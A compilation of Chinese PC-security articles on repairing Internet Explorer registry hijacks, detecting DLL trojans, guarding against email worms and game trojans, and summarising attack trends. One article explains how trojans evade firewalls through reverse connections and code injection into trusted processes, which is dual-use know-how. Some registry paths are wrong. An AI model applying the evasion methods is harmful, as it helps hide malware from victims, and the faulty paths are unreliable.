    (1)手动修改注册表法：开始菜单－>运行－>regedit->确定，打开注册表编辑工具，按如下顺序依次打开：HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Main　分支，找到Default_Page_URL键值名(用来设置默认微软主页)，在右窗口点击右键，将键值修改为 http://www.microsoft.com/windows/ie_intl/cn/start/ 即可。按F5键刷新生效。

    (2)自动文件导入注册表法：请把以下内容输入或粘贴复制到记事本内，以扩展名为reg的任意文件名存在C盘的任一目录下，然后执行此文件，根据提示，一路确认，即可显示成功导入注册表。

    REGEDIT4

    [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
    "default_page_url"="http://www.microsoft.com/windows/ie_intl/cn/start/"

    危害程度：一般

    （四）.主页设置被屏蔽锁定，且设置选项无效不可更改

    1.破坏特性：主页设置被禁用。

    2.表现形式：主页地址栏变灰色被屏蔽。

    3.清除方法：(1)手动修改注册表法：开始菜单－>运行－>regedit->确定，打开注册表编辑工具，按如下顺序依次打开：HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\分支，新建“ControlPanel”主键，然后在此主键下新建键值名为“HomePage”的DWORD值，值为“00000000”，按F5键刷新生效。

    (2)自动文件导入注册表法：请把以下内容输入或粘贴复制到记事本内，以扩展名为reg的任意文件名存在C盘的任一目录下，然后执行此文件，根据提示，一路确认，即可显示成功导入注册表。

    REGEDIT4

    [HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
    "HomePage"=dword:00000000

    危害程度：轻度

    （五）.默认的IE搜索引擎被修改

    1.破坏特性：将IE的默认微软搜索引擎更改。

    2.表现形式：搜索引擎被篡改。

    3.清除方法：(1)手动修改注册表法：开始菜单－>运行－>regedit->确定，打开注册表编辑工具，第一，按如下顺序依次打开：HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search分支，找到“SearchAssistant”键值名，在右面窗口点击“修改”，即可对其键值进行输入为： http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm ，然后再找到“CustomizeSearch”键值名，将其键值修改为： http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm ，按F5键刷新生效。

    (2)自动文件导入注册表法：请把以下内容输入或粘贴复制到记事本内，以扩展名为reg的任意文件名存在C盘的任一目录下，然后执行此文件，根据提示，一路确认，即可显示成功导入注册表。

    REGEDIT4

    [HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\Search]
    "SearchAssistant"="http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm"
    "CustomizeSearch"="http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm"

    危害程度：一般

    （六）.IE标题栏被添加非法信息
    1.破坏特性：通过修改注册表，使IE标题栏被强行添加宣传网站的广告信息。

    2.表现形式：在IE顶端蓝色标题栏上多出了什么“正点网，即使正点网！ http://www.zhengdian.com "尾巴。

    3.清除方法：(1)手动修改注册表法：开始菜单－>运行－>regedit->确定，打开注册表编辑工具，第一，按如下顺序依次打开：HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main分支，找到“Window Title”键值名，输入键值为Microsoft Internet Explorer，按F5刷新。

    第二，按如下顺序依次打开：HKEY_CURRENT_MACHINE\Software\Microsoft\InternetExplorer\Main分支，找到“Window Title”键值名，输入键值为Microsoft Internet Explorer，按F5刷新生效。

    (2)自动文件导入注册表法：请把以下内容输入或粘贴复制到记事本内，以扩展名为reg的任意文件名存在C盘的任一目录下，然后执行此文件，根据提示，一路确认，即可显示成功导入注册表。

    REGEDIT4

    [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
    "Window Title"="Microsoft Internet Explorer"

    [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
    "Window Title"="Microsoft Internet Explorer"

    危害程度：一般

    （七）.OE标题栏被添加非法信息破坏特性：

    破坏特性：通过修改注册表，在微软的集成电子邮件程序Microsoft Outlook顶端标题栏添加宣传网站的广告信息br]
    表现形式：在顶端的Outlook Express蓝色标题栏添加非法信息。

    清除方法：(1)手动修改注册表法：开始菜单－>运行－>regedit->确定，打开注册表编辑工具，按如下顺序依次打开：HKEY_LOCAL_USER\Software\Microsoft\Outlook Express分支，找到WindowTitle以及Store Root键值名，将其键值均设为空。按F5键刷新生效。

    (2)自动文件导入注册表法：请把以下内容输入或粘贴复制到记事本内，以扩展名为reg的任意文件名存在C盘的任一目录下，然后执行此文件，根据提示，一路确认，即可显示成功导入注册表。

    REGEDIT4

    [HKEY_CURRENT_USER\Software\Microsoft\Outlook Express]
    "WindowTitle"=""
    "Store Root"=""

    危害程度：一般

    （八）.鼠标右键菜单被添加非法网站链接：

    1.破坏特性：通过修改注册表，在鼠标右键弹出菜单里被添加非法站点的链接。

    2.表现形式：添加“网址之家”等诸如此类的链接信息。

    3.清除方法：(1)手动修改注册表法：开始菜单－>运行－>regedit->确定，打开注册表编辑工具，按如下顺序依次打开：HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\MenuExt分支，在左边窗口凡是属于非法链接的主键一律删除，按F5键刷新生效。

    4.危害程度：一般

    （九）.鼠标右键弹出菜单功能被禁用失常：

    1.破坏特性：通过修改注册表，鼠标右键弹出菜单功能在IE浏览器中被完全禁止。

    2.表现形式：在IE中点击右键毫无反应。

    3.清除方法：(1)手动修改注册表法：开始菜单－>运行－>regedit->确定，打开注册表编辑工具，按如下顺序依次打开：HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions分支，找到“NoBrowserContextMenu”键值名，将其键值设为“00000000”，按F5键刷新生效。

    (2)自动文件导入注册表法：请把以下内容输入或粘贴复制到记事本内，以扩展名为reg的任意文件名存在C盘的任一目录下，然后执行此文件，根据提示，一路确认，即可显示成功导入注册表。

    REGEDIT4

    [HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
    "NoBrowserContextMenu"=dword:00000000

    危害程度：轻度

    （十）.IE收藏夹被强行添加非法网站的地址链接

    破坏特性：通过修改注册表，强行在IE收藏夹内自动添加非法网站的链接信息。

    表现形式：躲藏在收藏夹下。

    清除方法：请用手动直接清除，用鼠标右键移动至该非法网站信息上，点击右键弹出菜单，选择删除即可。

    危害程度：一般

    （十一）.在IE工具栏非法添加按钮

    破坏特性：工具栏处添加非法按钮。

    表现形式：有按钮图标。

    清除方法：直接点击鼠标右键弹出菜单，选择“删除”即可。

    危害程度：一般

    （十二）.锁定地址栏的下拉菜单及其添加文字信息

    破坏特性：通过修改注册表，将地址栏的下拉菜单锁定变为灰色。

    表现形式：不仅使下拉菜单消失，而且在其上覆盖非法文字信息。

    清除方法：(1)手动修改注册表法：开始菜单－>运行－>regedit->确定，打开注册表编辑工具，按如下顺序依次打开：HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Toolbar分支，在右边窗口找到“LinksFolderName”键值名，将其键值设为“链接”，多余的字符一律去掉，按F5键刷新生效。

    危害程度：轻度

    （十三）.IE菜单“查看”下的“源文件”项被禁用

    破坏特性：通过修改注册表，将IE菜单“查看”下的“源文件”项锁定变为灰色。

    表现形式：“源文件”项不可用。

    清除方法：(1)手动修改注册表法：开始菜单－>运行－>regedit->确定，打开注册表编辑工具，第一，按如下顺序依次打开：HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions分支，找到"NoViewSource"键值名，将其键值设为“00000000”，按F5键刷新生效。

    按如下顺序依次打开：HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Restrictions分支，找到"NoViewSource"键值名，将其键值设为“00000000”，按F5键刷新生效。

    (2)自动文件导入注册表法：请把以下内容输入或粘贴复制到记事本内，以扩展名为reg的任意文件名存在C盘的任一目录下，然后执行此文件，根据提示，一路确认，即可显示成功导入注册表。

    REGEDIT4

    [HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
    "NoViewSource"=dword:00000000

    [HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Restrictions]
    "NoViewSource"=dword:00000000

    危害程度：轻度


防范邮件蠕虫病毒绝对实用四秘籍

《一键清理系统垃圾》

防范邮件蠕虫病毒绝对实用四秘籍

    除了可以用防火墙和杀毒软件来防杀邮件病毒外，还可以用以下方式配合来减少邮件病毒的危害：

    1、设定邮件的路径在C盘以外，因为C分区是病毒攻击频率最高的地方，万一受到防火墙不能过滤的新型病毒攻击，受到的损失也可减少。

    2、收到新邮件尽量使用“另存为”选项为邮件做备份（注意分类储存，不要在同一根目录下放全部的邮件）此时还可以趁机为邮件起一个更为一目了然的名字

    3、尽量在“通讯簿”不要设置太多的名单，如果要发送新邮件，可以进入邮件的储存目录，打开客户的发来的邮件，利用“回复”功能来发送新邮件（删除原有内容即可）；如果客户或朋友较多，利用回复不方便，可以新建一个文本文件（自己做好备份，记得路径及名称)，把客户的邮件地址一一列入其中，要发新邮件的时候，利用CTRL+C, CTRL+V把客户邮件地址粘贴到“收件人”栏中去——这样虽然麻烦一点，但是有效地防止了邮件病毒的进一步传播，须知现在的邮件病毒变种更新既多又快，防杀难免有漏洞，病毒一发作，就自动复制无数拷贝发送到“通讯簿”里所有的用户。

    用此法可以避免病毒的扩散，特别是有商业关系的客户不会因此受到牵连，发生误会从而影响合作关系。此法还可起到保密客户的作用，因为名单文本的目录和名称只有本机主人才知道。

    4、遇到带可执行文件（*.EXE, *.COM）或带有宏功能的附件（*.DOC等），不要选打开，最好先选择为“另存为”到磁盘上，用杀毒软件先查杀，这是共识了。


防御网络游戏外挂木马全攻略

《一键清理系统垃圾》

防御网络游戏外挂木马全攻略

    目前，很多人在各种论坛中发布各种所谓的外挂程序,或者不明网站的链接，我们奉劝各位，千万不要点击。因为那很有可能会捆绑一个“键盘纪录器”。
    为了您账号的安全，请您留心一下这些隐藏在诱惑中的“黑手”。建议您下载专业杀木马软件。

    防范方法：

    1、请将IE的"INTERNET选项"的"高级"设置为"恢复默认设置"。

    2、不要安装和下载一些来历不明的软件，特别是一些所谓的女神外挂程序。

    3、不要随便打开来历不明信件的附件。

    4、安装最新杀毒软件，并定时升级病毒库。

    5、小心网吧的计算机上安装有记录键盘操作的软件，或被安装了木马。使用网吧计算机时，需先
       按ctrl,alt,del三个键，看看是否有来历不明的程序正在运行，如果有，则立即将该程序结束
       任务。

    6、网吧上网的用户，最好是在上机器前去华军软件园下载LDM木马检查工具
      (bj.onlinedown.net/soft/11555.htm)，先扫描一下机器看是否有木马程序。

    · 针对于一些暴力破解密码的软件，破解用户的帐号密码

    这种方法主要是通过使用一些暴力破解密码的软件，用穷举法逐个的尝试用户的帐号密码，但需要使用者有一定的电脑知识，而且破解需要很长时间。

    防范方法：

    1、尽量避免将游戏帐号暴露在公众论坛和其他网站。

    2、用户在设置密码时，尽量设置的复杂一点，最好设置为8位数以上的字母、数字和其他符号的组
       合。

    3、不要使用可轻易获得的关于您的信息作为密码。这包括生日、身份证号码、手机号码、您所居
       住的街道的名字等等。

    4、经常更换密码，因为8位数以上的字母、数字和其他符号的组合也不是无懈可击的。

    5、申请密码保护，也就是设置安全码，安全码不要和密码设置的一样。如果您没有设置安全码，
       那么别人一旦破解您的密码，就可以把您的密码和注册资料(除证件号码外)全部修改。

    · 木马防御全攻略

    1、您的计算机是否已被装了木马？如何检测？

    1)检查注册表
      看HKEY_LOCAL_MACHINE/SOFTWARE/MicrosoftWindows/Curren Version 和
      HKEY_CURRENT_USER/Software/MicrosoftWindows/CurrentVersion下，所有以"Run"开头的键值
      名，其下有没有可疑的文件名。如果有，就需要删除相应的键值，再删除相应的应用程序。

    2)检查启动组
      木马们如果隐藏在启动组虽然不是十分隐蔽，但这里的确是自动加载运行的好场所，因此还是有
      木马喜欢在这里驻留的。启动组对应的文件夹为：C:windowsstart menuprogramsstartup，在注
      册表中的位置：
      HKEY_CURRENT_USER/Software/MicrosoftWindows/Current Version/ExplorerShell Folders
      Startup="C:windowsstart menuprogramsstartup"。要注意经常检查这两个地方哦！

    3)Win.ini以及System.ini也是木马们喜欢的隐蔽场所，要注意这些地方。
      比方说，Win.ini的[Windows]小节下的load和run后面在正常情况下是没有跟什么程序的，如果
      有了那就要小心了，看看是什么；在System.ini的[boot]小节的Shell=Explorer.exe后面也是加
      载木马的好场所，因此也要注意这里了。当你看到变成这样：
      Shell=Explorer.exewind0ws.exe，请注意那个wind0ws.exe很有可能就是木马服务端程序！赶快
      检查吧。

    4)检查C:windowswinstart.bat、C:windowswininit.ini、Autoexec.bat。木马们也很可能隐藏在
      那里。

    5)如果是EXE文件启动，那么运行这个程序，看木马是否被装入内存，端口是否打开。如果是，则
      说明要么是该文件启动木马程序，要么是该文件捆绑了木马程序，只好再找一个这样的程序，重
      新安装一下了。

    6)木马启动都有一个方式，它只是在一个特定的情况下启动，所以，平时多注意一下你的端口，查
      看一下正在运行的程序，用此来监测大部分木马应该没问题的。

    2、目前已经有一些专门的清除木马的软件，在新推出天网防火墙里面捆绑有强大的木马清除功能，清除一般木马的机制原理主要是：

    1)检测木马。

    2)找到木马启动文件，一般在注册表及与系统启动有关的文件里能找到木马文件的位置。

    3)删除木马文件，并且删除注册表或系统启动文件中关于木马的信息。

    但对于一些十分狡滑的木马，这些措施是无法把它们找出来的，现在检测木马的手段无非是通过网络连接和查看系统进程，事实上，一些技术高明的木马编制者完全可以通过合理的隐藏通讯和进程使木马很难被检测到。

    3、木马防范工具。

    防范木马工具有很多，请您务必安装一个，以提高您的计算机的安全性。

作者：
来源：华军软件园


分析木马客户端与服务端隐蔽通讯

《一键清理系统垃圾》

分析木马客户端与服务端隐蔽通讯

     现代木马的实现是建立在一种既可靠，又不易被宿主发现的通讯方案上的，本文就是对各种方案的实现方法，可靠性，安全性做了一些理论上的探讨。充分的理解木马的客户端和服务端是怎么进行隐藏的，不但可以帮助您能深刻的理解网络通信的原理，也可以更有效的做好安全防范。基于此我们编发了此文，下面我们进入正题。

    首先应该明确的是受害者的机器上运行的木马程序我们称之为服务端，控制者机器上运行的我们称之为客户端（其实对于现代的木马，已经很难说谁是客户，谁是服务了，不过我们还是继续用这种叫法）。另外虽然Windows9x仍然有巨大的用户基础，但是Windows9x向Windows XP迁徙只是早晚问题，所以这里的讨论主要是针对NT/2000/XP平台的。

    1.使用TCP协议，服务端侦听，客户端连接。

    这是最简单，最早，最广泛使用的一种通讯方案。使用过冰河或者被冰河客户端扫过的对此一定不会陌生。这种通讯方案是服务端在宿主机器上开一个TCP端口，然后等待客户端的连接，在通过对客户端的认证后，客户端就可以控制服务端了。由于是建立在TCP协议基础上，所以通讯的可靠性是得到保证的。但是通讯的安全性却很成问题。首先，使用像fport,tcpview pro这样的工具可以很容易的发现在某一端口上侦听的进程，以及进程对应的可执行文件。其次，在安装了防火墙的机器上，当客户端连接到服务端时，很容易引起防火墙报警。

    2.使用TCP协议。

    客户端侦听，服务端连接。这就是所谓的反向连接技术了。为了克服服务端在某一端口上侦听易被发现这一缺点，现在服务端不再侦听端口，而是去连接客户端在侦听的某一端口。这样用一般的port scanner或者fport就发现不了服务端了。而为了更好的麻痹宿主机，客户端侦听的端口一般是21,80,23这种任何人都要访问的端口。虽然在安装了防火墙的机器上，服务端去连接客户端还是要引起防火墙报警，但是一个粗心的用户很可能会忽略"应用程序xxxxx试图访问xxx.xxx.xxx.xxx通过端口80"这样的警告。

    这种反向连接技术要解决的一个问题是，服务端如何找到客户端。由于一般客户端都是拨号上网的，没有一个固定的IP，所以客户端IP不可能硬编码在服务端程序中。当然由于拨号上网用户的IP一般都是处于一个固定的IP地址范围内，服务端也可以扫描这个范围，然后根据被扫描主机的反馈来确定是否是自己的客户端，但是服务端扫描一个IP地址范围也太。另一个方法是客户端通过一个有固定IP或者固定域名的第三方发布自己的IP，实现的方法就很多了，比如通过一个公共的邮箱，通过一个个人主页，就看你有多大的想象力。

    3.使用UDP协议。

    服务端侦听，客户端连接；客户端侦听，服务端连接。方法和安全性与使用TCP协议差不多。需要注意的是UDP不是一个可靠的协议，所以，必须在UDP协议的基础上设计一个自己的可靠的报文传递协议。

    4.解决防火墙问题。

    无论是服务端被动侦听，还是服务端主动连接，在服务端和客户端试图建立连接时都会引起防火墙得报警。毕竟粗心得用户不会很多，所以，解决防火墙报警是服务端必须要解决的一个问题。一种方法是代码注入，服务端将自己注入到一个可以合法的与外界进行网络通讯的进程(比如 IE, ICQ, OICQ, TELNTED, FTPD, IIS等）的地址空间中，然后或者可以以一个新线程的形式运行，或者只是修改宿主进程，截获宿主进程的网络系统调用(WinSock)。后者的实现可能要麻烦一些。如果是以新线程的形式运行，那么然后或者可以被动侦听，或者可以主动连接。

    无论哪种情况都不会引起防火墙的报警(当然不是百分之百不会引起防火墙报警)。但要注意的是如果是被动侦听的话，比如寄生在IE内，用fport会发现IE在某一个端口侦听，这有可能会引起细心的用户的警觉。所以比较好得方法是在新线程内去主动连接客户端，而且连的是客户端的80端口；如果是寄生在OICQ内，何不连接客户端的8000端口。使用代码注入需要服务端具有若干特权，考虑到一般用户都是以Admin身份启动NT的，这应该不是一个问题(如果服务端是作为一个service启动的话，就更没问题了)。

作者：
来源：enet硅谷动力


个人计算机防范小黑客完全攻略

《一键清理系统垃圾》

个人计算机防范小黑客完全攻略

现在的黑客程序无处不入，小黑客们利用它们作恶多端……真是苦了一些无辜的网民啊！

黑客程序第一手：网页杀手

说真的，有多少人没领教过它的雄风呢？只需几句，便可将你的注册表改的体无完肤
~只需一段很短的代码，你的硬盘可能就要面临格式化的危险！

要防着这只黑手，可能只能借助软件了——即使是这样，危险依然存在……或许，最有效的方法就是不上黑客网，不上色情网，不上不知名的网站——这恐怕是不可能的！

也有人说不用IE，其实IE的确存在许多漏洞，就比如说吧，我上次弄了个网页炸弹——原理很简单只利用原子弹爆炸原理，无限量消耗内存。但是这个炸弹对腾讯和金山的浏览器不起丝毫的作用。哈，问题可在微软身上了。但是，说实在，现在除了IE，还有多少可靠的浏览器可用呢？

黑客程序第二手：邮件暗手

“你中奖啦！”“打开附件会有意外惊喜哦！”——这些话，你可千万别信！看到类似广告的邮件标题，最好就把它删掉——看都不看他。邮件暗手可不是闹着玩的！

或许，有人认为只要不打开附件就没事了。错！大家听说过脚本吗？秩序利用脚本，便可“帮”你打开附件——你说可怕不可怕？防邮件暗手的方法也不多讲了，但是要注意的是拒敌于家门外。也许很多人都有这样的遭遇：中了病毒、木马之类的东西，即使用反病毒软件也很难根除。的确如此，病毒在进步，决不让反病毒软件轻易的将他们赶尽杀绝。

黑客程序第三手：诱骗之手

现在的某些黑客程序是用户自己将他们引进计算机的。这句话一点也没错，真的如此。

这个经改良后的程序怎么怎么好；网上可以免费下载市面上很贵的电脑软件等等，往往让某些人放松了警惕——没想到这可能有危险！

黑客程序第四手：暴力之手

  有些人也许不会相信，有人可以将黑客程序强行安装到它的计算机上。其实，这是有可能的。入侵、恶意脚本等都有能力办到。要防住这一手，恐怕也只能靠网络防火墙和反病毒软件了……

  网络如此多娇，引无数英雄竞折腰……各位善良的网友——小心啊！

作者：瑞星
来源：太平洋电脑网


关于动态嵌入式DLL木马病毒的发现及清除

《一键清理系统垃圾》

关于动态嵌入式DLL木马病毒的发现及清除

  随着MS的操作系统从Win98过渡到Winnt系统(包括2k/xp)，MS的任务管理器也一下子脱胎换骨，变得火眼金睛起来(在WINNT下传统木马再也无法隐藏自己的进程)，这使得以前在win98下靠将进程注册为系统服务就能够从任务管理器中隐形的木马面临前所未有的危机，所以木马的开发者及时调整了开发思路，所以才会有今天这篇讨论如何清除动态嵌入式DLL木马的文章。

    首先，我们来了解一下什么是动态嵌入式木马，为了在NT系统下能够继续隐藏进程，木马的开发者们开始利用DLL(Dynamic Link Library动态链接库)文件，起初他们只是将自己的木马写成DLL形式来替换系统中负责Win Socket1.x的函数调用wsock32.dll(Win Socket2中则由WS2_32.DLL负责)，这样通过对约定函数的操作和对未知函数的转发(DLL木马替换wsock32.dll时会将之更名，以便实现日后的函数转发)来实现远程控制的功能。但是随着MS数字签名技术和文件恢复功能的出台，这种DLL马的生命力也日渐衰弱了，于是在开发者的努力下出现了时下的主流木马--动态嵌入式DLL木马,将DLL木马嵌入到正在运行的系统进程中.explorer.exe、svchost.exe、smss.exe等无法结束的系统关键进程是DLL马的最爱，这样这样在任务管理器里就不会出现我们的DLL文件，而是我们DLL的载体EXE文件.当然通过进一步的加工DLL木马还可以实现另外的一些如端口劫持/复用(也就是所谓的无端口)、注册为系统服务、开多线程保护、等功能。简而言之，就是DLL木马达到了前所未有的隐蔽程度。

    那么我们如何来发现并清除DLL木马呢？

    一，从DLL木马的DLL文件入手，我们知道system32是个捉迷藏的好地方，许多木马都削尖了脑袋往那里钻，DLL马也不例外，针对这一点我们可以在安装好系统和必要的应用程序后，对该目录下的EXE和DLL文件作一个记录：运行CMD--转换目录到system32--dir *.exe>exeback.txt& dir *.dll>dllback.txt,这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中,日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了.这是我们用同样的命令将system32下的EXE和DLL文件记录到另外exeback1.txt和dllback1.txt中,然后运行CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没有是最好，如果有的话也不要直接DLL掉，我们可以先把它移到回收站里，若系统没有异常反应再将之彻底删除或者提交给杀毒软件公司。

    二、上文也曾提到一些系统关键进程是这类木马的最爱，所以一旦我们怀疑系统已经进驻了DLL木马，我们当然要对这些关键进程重点照顾了，怎么照顾？这里推荐一个强大的脱壳工具工具Procedump.exe他可以帮您看出进程到底调用了那些DLL文件,但是由于有的进程调用的DLL文件非常多，使得靠我们自己去一个核对变的不太现实，所以我们会用到一个shotgun写的NT进程/内存模块查看器ps.exe，用命令ps.exe/a /m >nowdlls.txt将系统目前调用地所有DLL文件地名称保存到nowdlls.txt，然后我们再用fc将之于事先备份dllback.txt比较一下，这样也能够缩小排查范围。

    三、还记得木马的特征之一端口么？所有的木马只要进行连接，只要它接受/发送数据则必然会打开端口，DLL木马也不例外，这也为我们发现他们提供了一条线索，我们可以使用foundstone的进程端口查看工具Fport.exe来查看与端口对应的进程,这样可以将范围缩小到具体的进程,然后结合Procedump来查找DLL木马就比较容易了.当然有如上文提到的有些木马会通过端口劫持或者端口重用的方法来进行通信,139、80、1443、等常见端口则是木马的最爱。因为即使即使用户使用端口扫描软件检查自己的端口，发现的也是类似TCP UserIP:1026　ControllerIP:80

    ESTABLISHED 的情况，稍微疏忽一点，您就会以为是自己在浏览网页(防火墙也会这么认为的)。所以光看端口还不够，我们要对端口通信进行监控，这就是第四点要说的。

    四、我们可以利用嗅探器来了解打开的端口到底在传输些什么数据。通过将网卡设为混杂模式就可以接受所有的IP报文，嗅探程序可以从中选择值得关注的部分进行分析，剩下的无非是按照RFC文档对协议进行解码。这样就可以确定木马使用的端口，结合Fport和Procedump我们就能够查找到该DLL木马了。至于嗅探器个人推荐使用IRIS，图形界面比较容易上手。

    五、通常说道查杀木马我们会习惯性地到注册表碰碰运气，以前可能还蛮有效的，但如果碰到注册为系统服务的木马(原理：在NT/2K/XP这些系统中，系统启动时会加载指定的服务程序)这时候检查：启动组/注册表/autoexec.bat/win.ini/sysytem.ini/wininit.ini/*.inf(例如autorun.inf)/config.sys等文件 就发现不了丝毫的异样，这时候我们就应该查看一下系统服务了：右击我的电脑--管理--服务和应用程序--服务，这时您会看到100多个服务，(MS也真是的，其中75%对个人用户无用，可以禁止。)，慢慢找吧，看谁不顺眼就把它拎出来：)，当然如果您以前曾经用导出列表功能对服务备份过，则用文件比较的方法会很容易发现哪些是外来客，这时您可以记录下服务加载的是那个文件，然后用Resource Kits里提供的srvinstw.exe来移除该服务并清除被加载的文件。

    通过以上五步，基本能发现并清除狡猾的动态嵌入式DLL木马了,也许您也发现如果适当地做一些备份，会对我们的查找木马的过程有很大的帮助，当然也会减轻不少工作的压力哦。

作者：
来源：天极yesky


何为木马程序

《一键清理系统垃圾》

何为木马程序

   “木马”程序是目前比较流行的病毒文件，与一般的病毒不同，它不会自我繁殖，也并不“刻意”地去感染其他文件，它通过将自身伪装吸引用户下载执行，向施种木马者提供打开被种者电脑的门户，使施种者可以任意毁坏、窃取被种者的文件，甚至远程操控被种者的电脑。“木马”与计算机网络中常常要用到的远程控制软件有些相似，但由于远程控制软件是“善意”的控制，因此通常不具有隐蔽性；“木马”则完全相反，木马要达到的是“偷窃”性的远程控制，如果没有很强的隐蔽性的话，那就是“毫无价值”的。
   一个完整的“木马”程序包含了两部分：“服务器”和“控制器”。植入被种者电脑的是“服务器”部分，而所谓的“黑客”正是利用“控制器”进入运行了“服务器”的电脑。运行了木马程序的“服务器”以后，被种者的电脑就会有一个或几个端口被打开，使黑客可以利用这些打开的端口进入电脑系统，安全和个人隐私也就全无保障了！


何谓电脑病毒

《一键清理系统垃圾》

何谓电脑病毒

   电脑病毒是一段很小的程序，它是一种会不断“繁殖”、“感染”、“变异”的程序码，在传统的DOS环境下，通常它会寄存在可执行文件中，或者是软、硬盘开机磁盘驱动部分。随着被感染的程序由操作系统载入存储器而同时执行，病毒因此获得系统控制权。
   但在Windows中的病毒一般是附在文档中，一般来说，会使文档长度增加、错误信息出现及不断地感染其它程序。


黑客攻击方式的四种最新趋势

《一键清理系统垃圾》

黑客攻击方式的四种最新趋势

    从1988年开始，位于美国卡内基梅隆大学的CERT CC(计算机紧急响应小组协调中心)就开始调查入侵者的活动。CERT CC给出一些关于最新入侵者攻击方式的趋势。

    趋势一：攻击过程的自动化与攻击工具的快速更新

    攻击工具的自动化程度继续不断增强。自动化攻击涉及到的四个阶段都发生了变化。

    1.扫描潜在的受害者。从1997年起开始出现大量的扫描活动。目前，新的扫描工具利用更先进的扫描技术，变得更加有威力，并且提高了速度。

    2.入侵具有漏洞的系统。以前，对具有漏洞的系统的攻击是发生在大范围的扫描之后的。现在，攻击工具已经将对漏洞的入侵设计成为扫描活动的一部分，这样大大加快了入侵的速度。

    3.攻击扩散。2000年之前，攻击工具需要一个人来发起其余的攻击过程。现在，攻击工具能够自动发起新的攻击过程。例如红色代码和Nimda病毒这些工具就在18个小时之内传遍了全球。

    4.攻击工具的协同管理。自从1999年起，随着分布式攻击工具的产生，攻击者能够对大量分布在Internet之上的攻击工具发起攻击。现在，攻击者能够更加有效地发起一个分布式拒绝服务攻击。协同功能利用了大量大众化的协议如IRC(Internet Relay Chat)、IR(Instant Message)等的功能。

    趋势二：攻击工具的不断复杂化

    攻击工具的编写者采用了比以前更加先进的技术。攻击工具的特征码越来越难以通过分析来发现，并且越来越难以通过基于特征码的检测系统发现，例如防病毒软件和入侵检测系统。当今攻击工具的三个重要特点是反检测功能，动态行为特点以及攻击工具的模块化。

    1.反检测。攻击者采用了能够隐藏攻击工具的技术。这使得安全专家想要通过各种分析方法来判断新的攻击的过程变得更加困难和耗时。

    2.动态行为。以前的攻击工具按照预定的单一步骤发起进攻。现在的自动攻击工具能够按照不同的方法更改它们的特征，如随机选择、预定的决策路径或者通过入侵者直接的控制。

    3.攻击工具的模块化。和以前攻击工具仅仅实现一种攻击相比，新的攻击工具能够通过升级或者对部分模块的替换完成快速更改。而且，攻击工具能够在越来越多的平台上运行。例如，许多攻击工具采用了标准的协议如IRC和HTTP进行数据和命令的传输，这样，想要从正常的网络流量中分析出攻击特征就更加困难了。

    趋势三：漏洞发现得更快

    每一年报告给CERT/CC的漏洞数量都成倍增长。CERT/CC公布的漏洞数据2000年为1090个，2001年为2437个，2002年已经增加至4129个，就是说每天都有十几个新的漏洞被发现。可以想象，对于管理员来说想要跟上补丁的步伐是很困难的。而且，入侵者往往能够在软件厂商修补这些漏洞之前首先发现这些漏洞。随着发现漏洞的工具的自动化趋势，留给用户打补丁的时间越来越短。尤其是缓冲区溢出类型的漏洞，其危害性非常大而又无处不在，是计算机安全的最大的威胁。在CERT和其它国际性网络安全机构的调查中，这种类型的漏洞是对服务器造成后果最严重的。

    趋势四：渗透防火墙

    我们常常依赖防火墙提供一个安全的主要边界保护。但是情况是：

    * 已经存在一些绕过典型防火墙配置的技术，如IPP(the Internet Printing Protocol)和WebDAV(Web-based Distributed Authoring and Versioning)

    * 一些标榜是“防火墙适用”的协议实际上设计为能够绕过典型防火墙的配置。

    特定特征的“移动代码”(如ActiveX控件，Java和JavaScript)使得保护存在漏洞的系统以及发现恶意的软件更加困难。

    另外，随着Internet网络上计算机的不断增长，所有计算机之间存在很强的依存性。一旦某些计算机遭到了入侵，它就有可能成为入侵者的栖息地和跳板，作为进一步攻击的工具。对于网络基础架构如DNS系统、路由器的攻击也越来越成为严重的安全威胁。

    采用主动防御措施应对新一代网络攻击

    “红色代码”蠕虫病毒在因特网上传播的最初九小时内就感染了超过250，000个计算机系统。该感染导致的代价以每天2亿美元飞速增长，最终损失高达26亿美元。“红色代码” ，“红色代码II”，及“尼姆达”、“求职信”快速传播的威胁显示出现有的网络防御的严重的局限性。市场上大多数的入侵检测系统是简单的，对网络中新出现的、未知的、通常称做“瞬时攻击：Zero-day Attack”的威胁没有足够防御手段。

    黑客的“机会之窗”

